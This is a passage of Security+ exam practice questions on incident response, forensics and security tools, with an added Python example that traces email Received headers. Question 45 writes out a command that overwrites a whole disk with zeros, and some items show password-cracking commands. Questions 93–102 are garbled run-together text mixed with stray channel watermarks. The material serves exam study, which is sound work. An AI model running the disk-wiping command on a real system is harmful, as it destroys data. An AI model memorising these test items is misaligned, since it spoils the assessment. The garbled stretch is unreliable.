B. A VPC gateway
C. An NGSWG
D. A next-gen firewall
219. Brian wants to limit access to a federated service that uses Single Sign-On based on user attributes and group membership, as well as which federation member the user is logging in from. Which of the following options is best suited to his needs?
A. Geolocation
B. Account auditing
C. Access policies
D. Time-based logins
220. Sharif uses the chmod command in Linux to set the permissions to a file using the command chmod 700 example.txt. What permission has he set on the file?
A. All users have write access to the file.
B. The user has full access to the file.
C. All users have execute access to the file.
D. The user has execute access to the file.
221. Patrick regularly connects to untrusted networks when he travels and is concerned that an on-path attack could be executed against him as he browses websites. He would like to validate certificates against known certificates for those websites. What technique can he use to do this?
A. Check the CRL.
B. Use certificate pinning.
C. Compare his private key to their public key.
D. Compare their private key to their public key.
222. What is the most common format for certificates issued by certificate authorities?
A. DER
B. PFX
C. PEM
D. P7B
223. Michelle's organization uses self-signed certificates throughout its internal infrastructure. After a compromise, Michelle needs to revoke one of the self-signed certificates. How can she do that?
A. Contact the certificate authority and request that they revoke the certificate.
B. Add the certificate to the CRL.
C. Remove the certificate from the list of whitelisted certificates from each machine that trusts it.
D. Reissue the certificate, causing the old version to be invalidated.
224. Which of the following is not a common way to validate control over a domain for a domain-validated X.509 certificate?
A. Changing the DNS TXT record
B. Responding to an email sent to a contact in the domain's WHOIS information
C. Publishing a nonce provided by the certificate authority as part of the domain information
D. Changing the IP addresses associated with the domain
225. Fiona knows that SNMPv3 provides additional security features that previous versions of SNMP did not. Which of the following is not a security feature provided by SNMPv3?
A. SQL injection prevention
B. Message integrity
C. Message authentication
D. Message confidentiality
226. The following figure shows a proxy in use. In this usage model, the proxy receives a connection request, and then connects to the server and forwards the original request. What type of proxy is this?
A. A reverse proxy
B. A round-robin proxy
C. A next-generation proxy
D. A forward proxy
Chapter 4: Operations and Incident Response
THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:
4.1 Given a scenario, use the appropriate tool to assess organizational security
4.2 Summarize the importance of policies, processes, and procedures for incident response
4.3 Given an incident, utilize appropriate data sources to support an investigation
4.4 Given an incident, apply mitigation techniques or controls to secure an environment
4.5 Explain the key aspects of digital forensics
1. Mila wants to generate a unique digital fingerprint for a file, and needs to choose between a checksum and a hash. Which option should she choose and why should she choose it?
A. A hash, because it is unique to the file
B. A checksum, because it verifies the contents of the file
C. A hash, because it can be reversed to validate the file
D. A checksum, because it is less prone to collisions than a hash
2. Which of the following would prevent a user from installing a program on a company-owned mobile device?
A. An allowlist
B. A denylist
C. ACL
D. HIDS
3. Liam is responsible for monitoring security events in his company. He wants to see how diverse events may connect using his security information and event management (SIEM). He is interested in identifying different indicators of compromise that may point to the same breach. Which of the following would be most helpful for him to implement?
A. NIDS
B. PKI
C. A correlation dashboard
D. A trend dashboard
4. Emily wants to capture HTTPS packets using tcpdump. If the service is running on its default port and her Ethernet adapter is eth0, which tcpdump command should she use?
A. tcpdump eth0 -proto https
B. tcpdump -i eth0 -proto https
C. tcpdump tcp https eth0
D. tcpdump -i eth0 tcp port 443
5. Mila gives her team a scenario, and then asks them questions about how they would respond, what issues they expect they might encounter, and how they would handle those issues. What type of exercise has she conducted?
A. A tabletop exercise
B. A walk-through
C. A simulation
D. A drill
6. Murali is preparing to acquire data from various devices and systems that are targets in a forensic investigation. Which of the following devices is the least volatile according to the order of volatility?
A. Backups
B. CPU cache
C. Local disk
D. RAM
7. Henry has been asked for vulnerability scan results by an incident responder. He is curious to know why the responder needs scan results. What answer would you provide to him to explain why scan results are needed and are useful?
A. The scans will show the programs the attackers used.
B. The scans will show the versions of software installed before the attack.
C. Vulnerable services will provide clues about what the attackers may have targeted.
D. The scans will show where firewalls and other network devices were in place to help with incident analysis.
8. What phase of the incident response process should be placed at point A in the following image?
A. Simulations
B. Review
C. Recovery
D. Patching
9. Nick is reviewing commands run on a Windows 10 system and discovers that the route command was run with the -p flag. What occurred?
A. Routes were discovered using a ping command.
B. The route's path will be displayed.
C. A route was added that will persist between boots.
D. A route was added that will use the path listed in the command.
10. Lucca wants to acquire open source intelligence information using an automated tool that can leverage search engines and tools like Shodan. Which of the following tools should he select?
A. curl
B. hping
C. netcat
D. theHarvester
11. Brent wants to use a tool to help him analyze malware and attacks and wants to cover a broad range of tactics and tools that are used by adversaries. Which of the following is broadly implemented in technical tools and covers techniques and tactics without requiring a specific order of operations?
A. The Diamond Model of Intrusion Analysis
B. The Cyber Kill Chain
C. The MITRE ATT&CK framework
D. The CVSS standard
12. Ted needs to preserve a server for forensic purposes. Which of the following should he not do?
A. Turn the system off to ensure that data does not change.
B. Remove the drive while the system is running to ensure that data does not change.
C. Leave the machine connected to the network so that users can continue to use it.
D. All of the above
13. What mitigation technique is used to limit the ability of an attack to continue while keeping systems and services online?
A. Segmentation
B. Isolation
C. Nuking
D. Containment
14. Jessica wants to review the network traffic that her Windows system has sent to determine if a file containing sensitive data was uploaded from the system. What Windows log file can she use to find this information?
A. The application log
B. The network log
C. The security log
D. None of the above
15. What term is used to describe the documentation trail for control, analysis, transfer, and final disposition of evidence for digital forensic work?
A. Evidence log
B. Paper trail
C. Chain of custody
D. Digital footprint
16. Henry wants to determine what services are on a network that he is assessing. Which of the following tools will provide him with a list of services, ports, and their status?
A. nmap
B. route
C. hping
D. netstat
17. Nathan needs to know how many times an event occurred and wants to check a log file for that event. Which of the following grep commands will tell him how many times the event happened if each occurrence is logged independently in the logfile.txt log file, and uses a unique event ID: event101?
A. grep logfile.txt -n 'event101'
B. grep -c 'event101' logfile.txt
C. grep logfile.txt -c 'event101'
D. grep -c event101 -i logfile.txt
18. Jacob wants to ensure that all of the areas that are impacted by an incident are addressed by his incident response team. What term is used to describe the relationship and communications process that teams use to ensure that all of those involved are treated appropriately?
A. COOP
B. Stakeholder management
C. PAM
D. Communications planning
19. While Susan is conducting a forensic review of logs from two servers hosted in the same data center, she notices that log items on the first server occurred exactly an hour before matching events on the second server. What is the most likely cause of such exact occurrences?
A. The attack took an hour to complete, providing the attacker with access to the second machine an hour later.
B. The log entries are incorrect, causing the events to appear at the wrong time.
C. The attacker used a script causing events to happen exactly an hour apart.
D. A time offset is causing the events to appear to occur at different times.
20. What is the primary usage of Domain Name System (DNS) data in incident investigations and operational security monitoring?
A. DNS data is used to capture network scans.
B. DNS data can be used to identify domain transfer attacks.
C. DNS log information can be used to identify malware going to known malicious sites.
D. DNS log information can be used to identify unauthorized logins.
21. Dani generates an OpenSSL certificate using the following command. What has she set with the flag -rsa:2048?
openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out mycert.crt
A. The year that the certificate will expire
B. The key length in bytes
C. The year that the root certificate will expire
D. The key length in bits
22. Theresa wants to view the last 10 lines of a log file and to see it change as modifications are made. What command should she run on the Linux system she is logged in to?
A. head -f -end 10 logfile.log
B. tail -f logfile.log
C. foot -watch -l 10 logfile.log
D. follow -tail 10 logfile.log
23. Henry wants to acquire the firmware from a running system. What is the most likely technique that he will need to use to acquire the firmware?
A. Connect using a serial cable.
B. Acquire the firmware from memory using memory forensics tools.
C. Acquire the firmware from disk using disk forensic tools.
D. None of the above
24. Eric wants to determine how much bandwidth was used during a compromise and where the traffic was directed to. What technology can he implement before the event to help him see this detail and allow him to have an effective bandwidth monitoring solution?
A. A firewall
B. NetFlow
C. packetflow
D. A DLP
25. Naomi has acquired an image of a drive as part of a forensic process. She wants to ensure that the drive image matches the original. What should she create and record to validate this?
A. A third image to compare to the original and new image
B. A directory listing to show that the directories match
C. A photographic image of the two drives to show that they match
D. A hash of the drives to show that their hashes match
26. Ryan has been asked to run Nessus on his network. What type of tool has he been asked to run?
A. A fuzzer
B. A vulnerability scanner
C. A WAF
D. A protocol analyzer
27. Jason wants to ensure that the digital evidence he is collecting during his forensic investigation is admissible. Which of the following is a common requirement for admissibility of evidence?
A. It must be relevant.
B. It must be hearsay.
C. It must be timely.
D. It must be public.
28. Which of the following key elements is not typically included in the design of a communication plan?
A. Incident severity
B. Customer impact
C. Employee impact
D. Cost to the organization
29. Rick runs the following command:
cat file1.txt file2.txt
What will occur?
A. The contents of file1.txt will be appended to file2.txt.
B. The contents of file1.txt will be displayed, and then the contents of file2 will be displayed.
C. The contents of file2.txt will be appended to file1.txt.
D. The contents of both files will be combined line by line.
30. Michelle wants to check for authentication failures on a CentOS Linux–based system. Where should she look for these event logs?
A. /var/log/auth.log
B. /var/log/fail
C. /var/log/events
D. /var/log/secure
31. A web page's title is considered what type of information about the page?
A. Summary
B. Metadata
C. Header data
D. Hidden data
32. Nelson has discovered malware on one of the systems he is responsible for and wants to test it in a safe environment. Which of the following tools is best suited to that testing?
A. strings
B. scanless
C. Cuckoo
D. Sn1per
33. Lucca wants to view metadata for a file so that he can determine the author of the file. What tool should he use from the following list?
A. Autopsy
B. strings
C. exiftool
D. grep
34. Isaac wants to acquire an image of a system that includes the operating system. What tool can he use on a Windows system that can also capture live memory?
A. dd
B. FTK Imager
C. Autopsy
D. WinDump
35. Jason is conducting a forensic investigation and has retrieved artifacts in addition to drives and files. What should he do to document the artifacts he has acquired?
A. Image them using dd and ensure that a valid MD5sum is generated.
B. Take a picture of them, label them, and add them to the chain of custody documentation.
C. Contact law enforcement to properly handle the artifacts.
D. Engage legal counsel to advise him how to handle artifacts in an investigation.
36. Gary wants to check for the mail servers for example.com. What tool and command can he use to determine this?
A. nslookup -query=mx example.com
B. ping -email example.com
C. smtp -mx example.com
D. email-lookup -mx example.com
37. Which of the following is best suited to analyzing live SIP traffic?
A. Log files
B. Wireshark
C. Nessus
D. SIPper
38. Andrea wants to identify services on a remote machine and wants the services to be labeled with service names and other common details. Which of the following tools will not provide that information?
A. netcat
B. Sn1per
C. Nessus
D. nmap
39. Joseph is writing a forensic report and wants to be sure he includes appropriate detail. Which of the following would not typically be included while discussing analysis of a system?
A. Validation of the system clock's time settings
B. The operating system in use
C. The methods used to create the image
D. A picture of the person from whom the system was taken
40. Greg believes an attacker has been using a brute-force password attack against a Linux system he is responsible for. What command could he use to determine if this is the case?
A. grep "Failed password" /var/log/auth.log
B. tail /etc/bruteforce.log
C. head /etc/bruteforce.log
D. grep "Failed login" /etc/log/auth.log
41. Elaine wants to determine what websites a user has recently visited using the contents of a forensically acquired hard drive. Which of the following locations would not be useful for her investigation?
A. The browser cache
B. The browser history
C. The browser's bookmarks
D. Session data
42. Jason wants to acquire network forensic data. What tool should he use to gather this information?
A. nmap
B. Nessus
C. Wireshark
D. SNMP
43. Ananth has been told that attackers sometimes use ping to map networks. What information returned by ping could be most effectively used to determine network topology?
A. TTL
B. Packets sent
C. Packets received
D. Transit time
44. Susan has discovered evidence of a compromise that occurred approximately five months ago. She wants to conduct an incident investigation but is concerned about whether the data will exist. What policy guides how long logs and other data are kept in most organizations?
A. The organization's data classification policy
B. The organization's backup policy
C. The organization's retention policy
D. The organization's legal hold policy
45. Selah executes the following command on a system. What has she accomplished?
dd if=/dev/zero of=/dev/sda bs=4096
A. Copying the disk /dev/zero to the disk /dev/sda
B. Formatting /dev/sda
C. Writing zeroes to all of /dev/sda
D. Cloning /dev/sda1
46. Jim is preparing a presentation about his organization's incident response process and wants to explain why communications with involved groups and individuals across the organization are important. Which of the following is the primary reason that organizations communicate with and involve staff from affected areas throughout the organization in incident response efforts?
A. Legal compliance
B. Retention policies
C. Stakeholder management
D. A COOP
47. Elle is conducting an exercise for her organization and wants to run an exercise that is as close to an actual event as possible. What type of event should she run to help her organization get this type of real-world practice?
A. A simulation
B. A tabletop exercise
C. A walk-through
D. A wargame
48. Erin wants to determine what devices are on a network but cannot use a port scanner or vulnerability scanner. Which of the following techniques will provide the most data about the systems that are active on the network?
A. Run Wireshark in promiscuous mode.
B. Query DNS for all A records in the domain.
C. Review the CAM tables for all the switches in the network.
D. Run netstat on a local workstation.
49. What SIEM component collects data and sends it to the SIEM for analysis?
A. An alert level
B. A trend analyzer
C. A sensor
D. A sensitivity threshold
50. Alaina sets her antimalware solution to move infected files to a safe storage location without removing them from the system. What type of setting has she enabled?
A. Purge
B. Deep-freeze
C. Quarantine
D. Retention
51. A senior vice president in the organization that Chuck works in recently lost a phone that contained sensitive business plans and information about suppliers, designs, and other important materials. After interviewing the vice president, Chuck finds out that the phone did not have a passcode set and was not encrypted, and that it could not be remotely wiped. What type of control should Chuck recommend for his company to help prevent future issues like this?
A. Use containment techniques on the impacted phones.
B. Deploy a DLP system.
C. Deploy an MDM system.
D. Isolate the impacted phones.
52. The school that Gabby works for wants to prevent students from browsing websites that are not related to schoolwork. What type of solution is best suited to help prevent this?
A. A content filter
B. A DLP
C. A firewall
D. An IDS
53. Frank knows that forensic information he is interested in is stored on a system's hard drive. If he wants to follow the order of volatility, which of the following items should be forensically captured after the hard drive?
A. Caches and registers
B. Backups
C. Virtual memory
D. RAM
54. Greg runs the following command. What occurs?
chmod -R 755 /home/greg/files
A. All of the files in /home/greg/ are set to allow the group to read, write, and execute them, and Greg and the world can only read them.
B. The read, write, and execute permissions will be removed from all files in the /home/greg/files directory.
C. All of the files in /home/greg/files are set to allow Greg to read, write, and execute them, and the group and the world can only read them.
D. A new directory will be created with read, write, and execute permissions for the world and read-only permissions for Greg and the group he is in.
55. Charles wants to ensure that the forensic work that he is doing cannot be repudiated. How can he validate his attestations and documentation to ensure nonrepudiation?
A. Encrypt all forensic output.
B. Digitally sign the records.
C. Create an MD5 checksum of all images.
D. All of the above
56. Diana wants to capture the contents of physical memory using a command-line tool on a Linux system. Which of the following tools can accomplish this task?
A. ramdump
B. system-dump
C. memcpy
D. memdump
57. Valerie wants to capture the pagefile from a Windows system. Where can she find the file for acquisition?
A. C:\Windows\swap
B. C:\pagefile.sys
C. C:\Windows\users\swap.sys
D. C:\swap\pagefile.sys
58. Megan needs to conduct a forensic investigation of a virtual machine (VM) hosted in a VMware environment as part of an incident response effort. What is the best way for her to collect the VM?
A. As a snapshot using the VMware built-in tools
B. By using dd to an external drive
C. By using dd to an internal drive
D. By using a forensic imaging device after removing the server's drives
59. What forensic concept is key to establishing provenance for a forensic artifact?
A. Right to audit
B. Preservation
C. Chain of custody
D. Timelines
60. What role do digital forensics most often play in counterintelligence efforts?
A. They are used to determine what information was stolen by spies.
B. They are used to analyze tools and techniques used by intelligence agencies.
C. They are required for training purposes for intelligence agents.
D. They do not play a role in counterintelligence.
61. Which of the following groups is not typically part of an incident response team?
A. Law enforcement
B. Security analysts
C. Management
D. Communications staff
62. Bob needs to block Secure Shell (SSH) traffic between two security zones. Which of the following Linux iptables firewall rules will block that traffic from the 10.0.10.0/24 network to the system the rule is running on?
A. iptables -A INPUT -p tcp --dport 22 -i eth0 -s 10.0.10.0/24 -j DROP
B. iptables -D OUTPUT -p udp -dport 21 -i eth0 -s 10.0.10.255 -j DROP
C. iptables -A OUTPUT -p udp --dport 22 -i eth0 -s 10.0.10.255 -j BLOCK
D. iptables -D INPUT -p udp --dport 21 -I eth0 -s 10.0.10.0/24 -j DROP
63. Maria wants to add entries into the Linux system log so that they will be sent to her security information and event management (SIEM) device when specific scripted events occur. What Linux tool can she use to do this?
A. cat
B. slogd
C. logger
D. tail
64. Amanda's organization does not currently have an incident response plan. Which of the following reasons is not one she should present to management in support of creating one?
A. It will prevent incidents from occurring.
B. It will help responders react appropriately under stress.
C. It will prepare the organization for incidents.
D. It may be required for legal or compliance reasons.
65. Which of the following scenarios is least likely to result in data recovery being possible?
A. A file is deleted from a disk.
B. A file is overwritten by a smaller file.
C. A hard drive is quick-formatted.
D. A disk is degaussed.
66. Henry records a video of the removal of a drive from a system as he is preparing for a forensic investigation. What is the most likely reason for Henry to record the video?
A. To meet the order of volatility
B. To establish guilt beyond a reasonable doubt
C. To ensure data preservation
D. To document the chain of custody and provenance of the drive
67. Adam wants to use a tool to edit the contents of a drive. Which of the following tools is best suited to that purpose?
A. Autopsy
B. WinHex
C. dd
D. FTK Imager
68. Jill wants to build a checklist that includes all the steps to respond to a specific incident. What type of artifact should she create to do so in her security orchestration, automation, and response (SOAR) environment?
A. A BC plan
B. A playbook
C. A DR plan
D. A runbook
69. Alaina wants to use a password cracker against hashed passwords. Which of the following items is most important for her to know before she does this?
A. The length of the passwords
B. The last date the passwords were changed
C. The hashing method used for the passwords
D. The encryption method used for the passwords
70. Vincent wants to ensure that his staff does not install a popular game on the workstations they are issued. What type of control could he deploy as part of his endpoint security solution that would most effectively stop this?
A. An application approved list
B. A DLP
C. A content filter
D. An application block list
71. Charlene wants to set up a tool that can allow her to see all the systems a given IP address connects to and how much data is sent to that IP by port and protocol. Which of the following tools is not suited to meet that need?
A. IPFIX
B. IPSec
C. sFlow
D. NetFlow
72. A system that Sam is responsible for crashed, and Sam suspects malware may have caused an issue that led to the crash. Which of the following files is most likely to contain information if the malware was a file-less, memory-resident malware package?
A. The swap file
B. The Windows system log
C. A dump file
D. The Windows security log
73. Which of the following commands can be used to show the route to a remote system on a Windows 10 workstation?
A. traceroute
B. arp
C. tracert
D. netstat
74. Tools like PRTG and Cacti that monitor SNMP information are used to provide what type of information for an incident investigation?
A. Authentication logs
B. Bandwidth monitoring
C. System log information
D. Email metadata
75. Which of the following is not a key consideration when considering on-premises versus cloud forensic investigations?
A. Data breach notification laws
B. Right-to-audit clauses
C. Regulatory requirements
D. Provenance
76. The company Charles works for has recently had a stolen company cell phone result in a data breach. Charles wants to prevent future incidents of a similar nature. Which of the following mitigation techniques would be the most effective?
A. Enable FDE via MDM.
B. A firewall change
C. A DLP rule
D. A new URL filter rule
77. Henry runs the following command:
dig @8.8.8.8 example.com
What will it do?
A. Search example.com's DNS server for the host 8.8.8.8.
B. Search 8.8.8.8's DNS information for example.com.
C. Look up the hostname for 8.8.8.8.
D. Perform open source intelligence gathering about 8.8.8.8 and example.com.
78. Greg is collecting a forensic image of a drive using FTK Imager, and he wants to ensure that he has a valid copy. What should he do next?
A. Run the Linux cmp command to compare the two files.
B. Calculate an AES-256 hash of the two drives.
C. Compare an MD5 or SHA-1 hash of the drive to the image.
D. Compare the MD5 of each file on the drive to the MD5 of each file in the image.
79. Adam needs to search for a string in a large text file. Which of the following tools should he use to most efficiently find every occurrence of the text he is searching for?
A. cat
B. grep
C. head
D. tail
80. Angela wants to use segmentation as part of her mitigation techniques. Which of the following best describes a segmentation approach to network security?
A. Removing potentially infected or compromised systems from the network
B. Using firewalls and other tools to limit the spread of an active infection
C. Partitioning the network into segments based on user and system roles and security requirements
D. Adding security systems or devices to prevent data loss and exposure
81. Charlene has been asked to write a business continuity (BC) plan for her organization. Which of the following will a business continuity plan best handle?
A. How to respond during a person-made disaster
B. How to keep the organization running during a system outage
C. How to respond during a natural disaster
D. All of the above
82. Brad wants to create a self-signed x.509 certificate. Which of the following tools can be used to perform this task?
A. hping
B. Apache
C. OpenSSL
D. scp
83. Cameron wants to test for commonly used passwords in his organization. Which of the following commands would be most useful if he knows that his organization's name, mascot, and similar terms are often used as passwords?
A. john --wordlist "mywords.txt" --passwordfile.txt
B. ssh-test -"mascotname, orgname"
C. john -show passwordfile.txt
D. crack-passwords -wordlist "mascotname, orgname"
84. Which of the following capabilities is not built into Autopsy?
A. Disk imaging
B. Timeline generation
C. Automatic image filtering
D. Communication visualization
85. Alaina's company is considering signing a contract with a cloud service provider, and wants to determine how secure their services are. Which of the following is a method she is likely to be able to use to assess it?
A. Ask for permission to vulnerability scan the vendor's production service.
B. Conduct an audit of the organization.
C. Review an existing SOC audit.
D. Hire a third party to audit the organization.
86. Erin is working through the Cyber Kill Chain and has completed the exploitation phase as part of a penetration test. What step would come next?
A. Lateral movement
B. Privilege escalation
C. Obfuscation
D. Exfiltration
87. Dana wants to use an exploitation framework to perform a realistic penetration test of her organization. Which of the following tools would fit that requirement?
A. Cuckoo
B. theHarvester
C. Nessus
D. Metasploit
88. Cynthia has been asked to build a playbook for the SOAR system that her organization uses. What will she build?
A. A set of rules with actions that will be performed when an event occurs using data collected or provided to the SOAR system
B. An automated incident response process that will be run to support the incident response (IR) team
C. A trend analysis–driven script that will provide instructions to the IR team
D. A set of actions that the team will perform to use the SOAR to respond to an incident
89. What incident response step is missing in the following image?
A. Business continuity
B. Containment
C. Response
D. Discovery
90. Gurvinder's corporate data center is located in an area that FEMA has identified as being part of a 100-year floodplain. He knows that there is a chance in any given year that his data center could be completely flooded and underwater, and he wants to ensure that his organization knows what to do if that happens. What type of plan should he write?
A. A Continuity of Operations Plan
B. A business continuity plan
C. A flood insurance plan
D. A disaster recovery plan
91. Frank wants to identify where network latency is occurring between his computer and a remote server. Which of the following tools is best suited to identifying both the route used and which systems are responding in a timely manner?
A. ping
B. tracert
C. pathping
D. netcat
92. Derek wants to see what DNS information can be queried for his organization as well as what hostnames and subdomains may exist. Which of the following tools can provide both DNS query information and Google search information about hosts and domains through a single tool?
A. dnsenum
B. dig
C. host
D. dnscat
93. Jill has been asked to perform data recovery due to her forensic skills. What should she tell the person asking to perform data recovery to give her the best chance of restoring lost files that were accidentally deleted?
A. Immediately reboot using the reset switch to create a lost file memory dump.
B. Turnoff“securedelete”sothatthefilescanbemoreeasilyrecovered.
C. Donotsaveanyfilesormakeanychangestothesystem.
D. Alloftheabove
94. WhatphasefollowslateralmovementintheCyberKillChain?
A. Exfiltration
B. Exploitation
C. Anti-forensics
D. Privilegeescalation
Telegram Channel @nettrain
95. Veronicahascompletedtherecoveryphaseofherorganization'sincidentresponseplan.Whatphaseshouldshemoveintonext?
A. Preparation
B. Lessonslearned
C. Recovery
D. Documentation
96. Michellehasbeenaskedtosanitizeanumberofdrivestoensurethatsensitivedataisnotexposedwhensystemsareremovedfromservice.Whichofthefollowingisnotavalidmeansofsanitizingharddrives?
A. Physicaldestruction
B. Degaussing
C. Quick-formattingthedrives
D. Zero-wipingthedrives
97. Bartisinvestigatinganincident,andneedstoidentifythecreatorofaMicrosoftOfficedocument.Wherewouldhefindthattypeofinformation?
A. Inthefilename
B. IntheMicrosoftOfficelogfiles
C. IntheWindowsapplicationlog
D. Inthefilemetadata
98. NathanielwantstoallowChromethroughtheWindowsDefenderfirewall.Whattypeoffirewallrulechangewillheneedtopermitthis?
A. AllowTCP80and443trafficfromthesystemtotheInternet.
B. AddChrometotheWindowsDefenderFirewallallowedapplications.
C. AllowTCP80and443trafficfromtheInternettothesystem.
D. Alloftheabove
99. NathanwantstoperformwhoisqueriesonallthehostsinaclassCnetwork.WhichofthefollowingtoolscandothatandalsobeusedtodiscovernoncontiguousIPblocksinanautomatedfashion?
A. netcat
Telegram Channel @nettrain
B. dnsenum
C. dig
D. nslookup
100. Whatkeyforensictoolreliesoncorrectlysetsystemclockstoworkproperly?
A. Diskhashing
B. Timelining
C. Forensicdiskacquisition
D. Filemetadataanalysis
101. Valerieiswritingherorganization'sforensicplaybooksandknowsthatthestatethatsheoperatesinhasadatabreachnotificationlaw.Whichofthefollowingkeyitemsismostlikelytobeinfluencedbythatlaw?
A. WhetherValeriecallsthepoliceforforensicinvestigationhelp
B. Themaximumamountoftimeuntilshehastonotifycustomersofsensitivedatabreaches
C. Thecertificationtypesandlevelsthatherstaffhavetomaintain
D. Themaximumnumberofresidentsthatshecannotifyaboutabreach
102. Aspartofabreachresponse,NaomidiscoversthatSocialSecuritynumbers(SSNs)weresentinaspreadsheetviaemailbyanattackerwhogainedcontrolofaworkstationathercompany'sheadquarters.NaomiwantstoensurethatmoreSSNsarenotsentfromherenvironment.Whattypeofmitigationtechniqueismostlikelytopreventthiswhileallowingoperationstocontinueinasnormalamanneraspossible?
A. Antimalwareinstalledattheemailgateway
B. Afirewallthatblocksalloutboundemail
C. ADLPruleblockingSSNsinemail
D. AnIDSruleblockingSSNsinemail
103. Troy wants to review metadata about an email he has received to determine what system or server the email was sent from. Where can he find this information?
A. In the email message's footer
B. In the to: field
C. In the email message's headers
D. In the from: field
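For question 103, the headers that answer "where did this come from" are the Received lines, which each MTA prepends as the message passes through it, so the bottom one is the oldest hop. The following Python is an added example, not code from the book: it parses each Received header into the name the sender claimed (HELO), the IP address the receiving server actually observed, which server recorded the hop and when, and then separates what the chain claims about the origin from the one hop our own MTA wrote and can vouch for. The message, host names and the addresses (all from documentation ranges) are constructed; the set of trusted MTAs is an assumption.

```python
import email
import re

# Assumed: inbound MTAs we operate, whose Received headers we can trust.
TRUSTED_MTAS = {"mail.example.com"}

HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s*(?:\((?P<comment>[^)]*)\))?\s*by\s+(?P<by>\S+)",
    re.IGNORECASE,
)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(value):
    """Split one Received header into claimed sender, observed IP, recorder, date."""
    value = re.sub(r"\s+", " ", value).strip()      # unfold continuation lines
    m = HOP_RE.search(value)
    if not m:
        return None
    comment = m.group("comment") or ""
    # The bracketed IP inside the parenthesised comment is what the receiving
    # MTA observed on the wire; the HELO name before it is whatever the sender said.
    ip = IP_RE.search(comment) or IP_RE.search(m.group("helo"))
    date = value.rsplit(";", 1)[1].strip() if ";" in value else None
    return {
        "helo": m.group("helo"),
        "ip": ip.group(1) if ip else None,
        "by": m.group("by").rstrip(";"),
        "date": date,
    }


def trace_origin(raw_bytes, trusted_mtas=TRUSTED_MTAS):
    """Return the hop list (newest first), the claimed origin, and the one IP we saw."""
    msg = email.message_from_bytes(raw_bytes)
    hops = [h for h in map(parse_received, msg.get_all("Received", [])) if h]
    verified = next((h for h in hops if h["by"].lower() in trusted_mtas), None)
    return {
        "hops": hops,
        "origin_claimed": hops[-1] if hops else None,   # per the full chain
        "last_verified_ip": verified["ip"] if verified else None,  # per our MTA
        "from_header": msg.get("From"),
    }


# Constructed sample: three hops, the earliest from a host with no reverse DNS.
SAMPLE_EMAIL = (
    b"Received: from mx2.example.net (mx2.example.net [203.0.113.7])\n"
    b"\tby mail.example.com with ESMTPS id abc123; Tue, 2 Mar 2021 10:01:02 +0000\n"
    b"Received: from relay.example.net (relay.example.net [203.0.113.22])\n"
    b"\tby mx2.example.net with ESMTP; Tue, 2 Mar 2021 10:01:00 +0000\n"
    b"Received: from [192.0.2.55] (unknown [198.51.100.9])\n"
    b"\tby relay.example.net with ESMTPA; Tue, 2 Mar 2021 10:00:58 +0000\n"
    b"From: \"Accounts Payable\" <accounts@example.net>\n"
    b"To: troy@example.com\n"
    b"Subject: Invoice 4471\n"
    b"\n"
    b"Please see the attached invoice.\n"
)

if __name__ == "__main__":
    for hop in trace_origin(SAMPLE_EMAIL)["hops"]:
        print(hop)
```

Only the hop written by a server you control is evidence; every Received line below it was written by someone else and can be forged wholesale, which is why the example reports the claimed origin and the verified IP separately.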
104. Henry is working with local police on a forensic case and discovers that he needs data from a service provider in another state. What issue is likely to limit their ability to acquire data from the service provider?
A. Jurisdiction
B. Venue
C. Legislation
D. Breach laws
105. Olivia wants to test the strength of passwords on systems in her network. Which of the following tools is best suited to that task?
A. John the Ripper
B. Rainbow tables
C. Crack.it
D. The Hunter
106. What U.S. federal agency is in charge of COOP?
A. The USDA
B. FEMA
C. The NSA
D. The FBI
107. Elaine wants to write a series of scripts to gather security configuration information from Windows 10 workstations. What tool should she use to perform this task?
A. Bash
B. PowerShell
C. Python
D. SSH
108. As part of his incident response, Ramon wants to determine what was said on a Voice over IP (VoIP) call. Which of the following data sources will provide him with the audio from the call?
A. Call manager logs
B. SIP logs
C. A Wireshark capture of traffic from the phone
D. None of the above
109. Isabelle wants to gather information about what systems a host is connecting to, how much traffic is sent, and similar details. Which of the following options would not allow her to perform that task?
A. IPFIX
B. NetFlow
C. NXLog
D. sFlow
110. As part of an incident response process, Pete puts a compromised system onto a virtual LAN (VLAN) that he creates that only houses that system and does not allow it access to the Internet. What mitigation technique has he used?
A. Isolation
B. Containment
C. Segmentation
D. Eradication
111. Lucca needs to conduct a forensic examination of a live virtual machine (VM). What forensic artifact should he acquire?
A. An image of live memory using FTK Imager from the VM
B. A dd image of the virtual machine disk image
C. A snapshot of the VM using the underlying virtualization environment
D. All of the above
112. James has a PCAP file that he saved while conducting an incident response exercise. He wants to determine if his intrusion prevention system (IPS) could detect the attack after configuring new detection rules. What tool will help him use the PCAP file for his testing?
A. hping
B. tcpreplay
C. tcpdump
D. Cuckoo
113. What type of file is created when Windows experiences a blue screen of death?
A. A security log
B. A blue log
C. A dump file
D. A tcpdump
114. Ed wants to ensure that a compromise on his network does not spread to parts of the network with different security levels. What mitigation technique should he use prior to the attack to help with this?
A. Isolation
B. Fragmentation
C. Tiering
D. Segmentation
115. Derek has acquired over 20 hard drives as part of a forensic investigation. What key process is important to ensure that each drive is tracked and managed properly over time?
A. Tagging the drives
B. Taking pictures of each drive
C. Labeling each drive with its order of volatility
D. Interviewing each person whose drive is imaged
116. What term describes the ownership, custody, and acquisition of digital forensic artifacts and images?
A. E-discovery
B. Provenance
C. Jurisdiction
D. Volatility
117. Elle wants to acquire the live memory (RAM) from a machine that is currently turned on. Which of the following tools is best suited to acquiring the contents of the system's memory?
A. Autopsy
B. The Volatility framework
C. dd
D. netcat
118. Randy believes that a misconfigured firewall is blocking traffic sent from some systems in his network to his web server. He knows that the traffic should be coming in as HTTPS to his web server, and he wants to check to make sure the traffic is received. What tool can he use to test his theory?
A. tracert
B. Sn1per
C. traceroute
D. Wireshark
119. Ryan wants to implement a flexible and reliable remote logging environment for his Linux systems. Which of the following tools is least suited to that requirement?
A. rsyslog
B. syslog
C. NXLog
D. syslog-ng
120. Susan has been reading about a newly discovered exploit, and wants to test her IPS rules to see if the sample code will work. In order to use the exploit, she needs to send a specifically crafted UDP packet to a DHCP server. What tool can she use to craft and send this test exploit to see if it is detected?
A. hping
B. scanless
C. curl
D. pathping
121. Valerie wants to check to see if a SQL injection attack occurred against her web application on a Linux system. Which log file should she check for this type of information?
A. The security log
B. The DNS log
C. The auth log
D. The web server log
